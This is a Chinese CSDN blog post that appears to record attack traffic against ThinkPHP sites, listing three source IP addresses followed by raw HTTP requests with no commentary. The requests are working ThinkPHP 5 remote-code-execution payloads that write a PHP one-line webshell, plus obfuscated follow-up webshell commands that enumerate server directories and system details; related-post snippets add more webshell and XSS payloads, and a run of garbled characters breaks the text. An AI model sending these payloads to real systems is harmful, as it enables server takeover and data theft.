php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击

最新推荐文章于 2022-11-10 19:28:11 发布
最新推荐文章于 2022-11-10 19:28:11 发布
阅读量643 收藏
点赞数
文章标签: php %3c0x1a%3e是什么
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36410567/article/details/115108157
版权

ThinkPHP 漏洞扫描 网络安全 代码注入 服务器防护
关键词由CSDN通过智能技术生成

利用ThinkPHP漏洞扫描攻击

115.238.244.112   119.3.90.139    94.191.10.105

40df6573d872270ca3fe57d8c25b06f1.png

72680addf68e8d1799a264d02fdc82ad.png

f956d734a7b8d7f9328d97cdef2a4b37.png

824fbf778fb80687578881d053c6ebc5.png

b1847fc596b54fd4b7ebfb874d3d2426.png

6a43e3563261a1f599e185cba99d68f6.png

beda999d1301a4e8c0d308b7ebedcdce.png

e91a4043ee04415ec24ed1837608c32a.png

bad60131b0da8cca125f7fcfa3f18719.png

9f299480e47804925e4f3422cf3aee75.png

a475ca80a953afd7a28b478d2c4fdcf1.png

de4170274faaccbc2df648519f79c035.png

9b439c787045acca84796cb343ccdfc5.png

08a6350b768287a46afc569e67c42494.png

dc7aaad8bb29cf9fdbd72a2449d490ce.png

24e6c4ade96e20bbefaa77f178671ba6.png

f23fb70e173c470aee4f7de9ca064312.png

843be794d4e2534aa718a606d5e99c38.png

10028d2f2ba4c8234e02827985e75af1.png

POST /index.php/?s=captcha HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 172

_method=construct&filter[]=assert&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&server=-1<?php @eval($_POST[spread]);?>

POST /index.php/?s=captcha HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 183

Cookie: _f8a26=http://10.42.19.31:10000

_method=__construct&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&method=get&server[REQUEST_METHOD]=<?php @eval($_POST[spread]);?>

POST /spread.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 988

spread=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22SB360%22%3Becho%20%40asenc(%24output)%3Becho%20%22SB360%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%7C%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%7C%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

POST /spread.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

Content-Length: 1717

Cookie: _f8a26=http://10.42.163.158:10000

spread=%40eval%2F%2A%15%99%D0%21%03%19s%20%0B%CB%A8%DD%E3%A3%C5%C4%BB%C5%CE%2A%2F%01%28%24%7B%27%5FP%27.%27OST%27%7D%5Bz9%5D%2F%2A%A0%9B%3F%C0%9A%3F%E0%99%3F%20%99%E3%2A%2F%01%28%24%7B%27%5FPOS%27.%27T%27%7D%5Bz0%5D%29%29%3B&z0=ODQzMTQzO0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtlY2hvKCItPnwiKTskR0xPQkFMU1snSSddPTA7JEdMT0JBTFNbJ0QnXT1pc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKT8kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOihpc3NldCgkX1NFUlZFUlsnQVBQTF9QSFlTSUNBTF9QQVRIJ10pP3RyaW0oJF9TRVJWRVJbJ0FQUExfUEhZU0lDQUxfUEFUSCddLCJcXCIpOihpc3NldCgkX1snUEFUSF9UUkFOU0xBVEVEJ10pP3N0cl9yZXBsYWNlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKTpzdHJfcmVwbGFjZShzdHJfcmVwbGFjZSgiLyIsIlxcIixpc3NldCgkX1NFUlZFUlsiUEhQX1NFTEYiXSk%2FJF9TRVJWRVJbIlBIUF9TRUxGIl06KGlzc2V0KCRfU0VSVkVSWyJVUkwiXSk%2FJF9TRVJWRVJbIlVSTCJdOiRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdKSksIiIsaXNzZXQoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKT8kX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl06JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKSkpO0JMKCRHTE9CQUxTWydEJ10sMCk7ZnVuY3Rpb24gQkwoJFAsJE4pe2lmKGlzX2ZpbGUoJFApfHwkR0xPQkFMU1snSSddPj0kX1BPU1RbInoyIl0pcmV0dXJuOyRKPWJhc2VuYW1lKCRQKTtpZigkUD09JEdMT0JBTFNbJ0QnXSkkSj0iKiI7aWYoc3RyaXBvcygifHwiLCJ8Ii4kSi4ifCIpPT09RkFMU0UpRFcoJFApOyRBPUBvcGVuZGlyKCRQKTtpZigkQSE9TlVMTCl7d2hpbGUoJEI9QHJlYWRkaXIoJEEpKXtpZigkQiE9Ii4iJiYkQiE9Ii4uIikkRT0kUC4iLyIuJEI7aWYoQGlzX2RpcigkRSkmJiROPCRfUE9TVFsiejMiXSlCTCgkRSwkTisxKTt9QGNsb3NlZGlyKCRBKTt9fWZ1bmN0aW9uIERXKCRIKSB7JE49InRtcC50bXAiO2lmKGlzX2RpcigkSCkpe2lmKEBmd3JpdGUoQGZvcGVuKCIkSC8kTiIsICd3JyksInRtcCIpKXtAdW5saW5rKCIkSC8kTiIpO2VjaG8gc3RyX3JlcGxhY2UoIlxcIiwiLyIsJEgpLiJ8IjskR0xPQkFMU1snSSddPSRHTE9CQUxTWydJJ10rMTt9fX1lY2hvKCJ8PC0iKTtkaWUoKTs%3D&z9=BaSE64%5FdEcOdE&z2=1&z3=100

GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B1%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5CRequest/input&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

GET /public/index.php?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)

长弓手地鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BlueCat.rar_BlueCat_SPARTAN-3E_Xilinx_linux spartan
09-22
通过阅读这份“BlueCat Linux Board Support Guide”,开发者将能够充分利用Spartan-3E FPGA的潜力,为各种嵌入式应用构建基于Linux的高效解决方案。对于想要在FPGA上部署Linux系统的工程师来说,这份文档无疑是一份...
Web安全-一句话木马
liuwei0376的专栏
08-20 4035
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
sql注入与一句话木马
告白的博客
07-09 3248
0x00 sql注入之一句话木马 首先介绍一下一句话木马: 一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
学习笔记-ThinkPHP5漏洞分析之代码执行(七)
人饭子的博客
11-09 1163
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
【无标题】信息安全之漏洞利用(二)
m0_53055338的博客
04-23 2648
信息安全之漏洞利用二 任务四:文件上传 1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。 2、打开File Upload界面,将PHP一句话木马上传。 3、得到木马在服务器上的路径。如图 4、打开中国菜刀,把上传木马路径添加到工具上。 5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)如图 任务五: 1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。 2、输入
xss payload大全(实用)
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
Spartan-3E_Starter_Kit.rar_55ced</script>3ef1a_alert(1)_c5457"><
09-23
《Spartan-3E开发板入门指南》 Xilinx公司的Spartan-3E系列现场可编程门阵列(FPGA)是针对成本敏感的消费电子应用领域的一款高效解决方案。这款芯片家族以其高性价比、丰富的功能集以及广泛的用途赢得了工程师们的...
MicroBlaze_Spartan3_Sample.rar_SPARTAN-3E_microblaze_spartan mic
09-22
【标题】"MicroBlaze_Spartan3_Sample.rar_SPARTAN-3E_microblaze_spartan mic" 涉及的是MicroBlaze软核处理器在Xilinx Spartan-3E FPGA芯片上的应用示例。 MicroBlaze是Xilinx公司推出的一种可定制的32位RISC...
UART_send.rar_UART 3E_spartan 3e verilog_uart_send
09-22
Verilog代码会利用这些资源创建一个可配置的UART模块,该模块能够根据预设的波特率(bits per second,bps)生成时钟信号,并进行数据发送和接收。 UART_send Verilog模块可能包含以下几个主要部分: 1. **波特率...
ddr2.rar_SPARTAN-3E_ddr2_ddr2 xilinx_spartan 3A_spartan-3a
09-20
在本项目中,我们聚焦于Xilinx Spartan-3E系列FPGA(Field Programmable Gate Array)实现的DDR2控制器。Spartan-3E是Xilinx公司提供的低成本、高性能的FPGA解决方案,适用于各种嵌入式系统和数字信号处理应用。 ...
xss payload
07-15 382
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
XSS(跨站脚本攻击) - 常用代码大全
热门推荐
CHK的博客
08-20 5万+
XSS(跨站脚本攻击) - 常用代码大全: 1'"()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;prompt(915149)&lt;/ScRiPt&gt; &lt;svg/onload=alert(1)&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&a
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
webshell之一句话木马变形
weixin_30371875的博客
05-05 1482
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COO...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
[漏洞复现]thinkphp5代码执行漏洞
Vicl1fe的博客
05-30 2886
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://paper.seebug.org/760/ 漏洞概述 漏洞利用
22.ThinkPHP5框架缺陷导致远程命令执行
weixin_30478757的博客
12-12 444
前言: 昨天爆出了ThinkPHP5框架缺陷导致远程命令执行,大佬们都赶上潮流挖洞,小白还是默默学习一下这个漏洞 漏洞影响范围: Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23 漏洞产生原因: Thinkphp5.x版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在 admin,index 模块、没有开启强制路由的条件下(默认...
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
a1b2c3是弱口令
12-11 1万+
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 复现环境 ThinkPHP 5.0.20版本 环境启动后,访问http://192.168.1.15:8080即可看到ThinkPHP默认启动页面。 漏洞复现 payload: /index.php?s=inde...
thinkphp5.0.22漏洞利用
qq_52223347的博客
03-10 3666
一、搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/get&name=database.username 查看数据库的用户 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami whoa
chars[x % 0x3E]
最新发布
05-10
具体来说,chars 是一个长度为 62 的字符数组,包含了大小写字母和数字,x % 0x3E 的结果是一个小于 62 的数,作为 chars 数组的下标,可以得到对应的字符。这段代码可能是用于实现短链接的生成,把一个长的 URL ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值